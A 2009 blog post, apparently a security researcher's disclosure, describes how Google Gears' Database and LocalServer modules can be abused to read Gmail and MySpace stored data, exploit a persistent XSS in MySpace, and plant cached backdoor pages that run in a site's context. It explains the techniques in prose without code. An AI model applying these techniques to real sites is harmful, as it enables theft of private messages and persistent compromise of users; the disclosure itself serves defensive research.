Sunday, November 29, 2009

Stealing Databases and Setting Backdoors on Google Gears

Google Gears has two important modules, the LocalServer and the Database. The Database module is used to store data in a relational database stored on the user’s hard disk and accessible via JavaScript. The LocalServer is like an advanced cache, where files can be stored and served locally.

In a browser phishing attack the attacker might be able to serve content as an 'http' site that is permitted by the victim to use Google Gears. By running JavaScript as mail.google.com for example, an attacker can read the entire inbox of a Gears enabled user, same goes for MySpace private messages as well. Both these sites use ‘http’ for Google Gears which makes these kind of attacks possible. The Google Gears implementation of MySpace is flawed, the data stored in the Google Gears database is returned to the user without proper encoding, resulting in a persistent XSS. This is probably the first publicly disclosed vulnerability where Google Gears is involved in a XSS.

The LocalServer allows an attacker to cache any file on the browser of the victim for a specific site. For example he could cache a file like 'http://mail.google.com/gearsBackdoor.html' in the LocalServer of the victim with malicious content. The attacker can call this page either by sending a link to the victim or by loading it in an iframe when the victim visits his website. When that happens the page is served from the LocalServer and the malicious content is executed in the context of mail.google.com. A more advanced attack would be to place a backdoor in the same name as a file that is part of the website. This way every time the user logs in to the website the backdoor would be called automatically. Obviously this kind of an attack can have serious consequences for the victim.

I have enumerated seven different types of backdoors that can be placed with Google Gears. Details of these techniques will be available in a whitepaper that I would release soon. Imposter can be used to both steal database contents and place backdoors.

No comments:

Post a Comment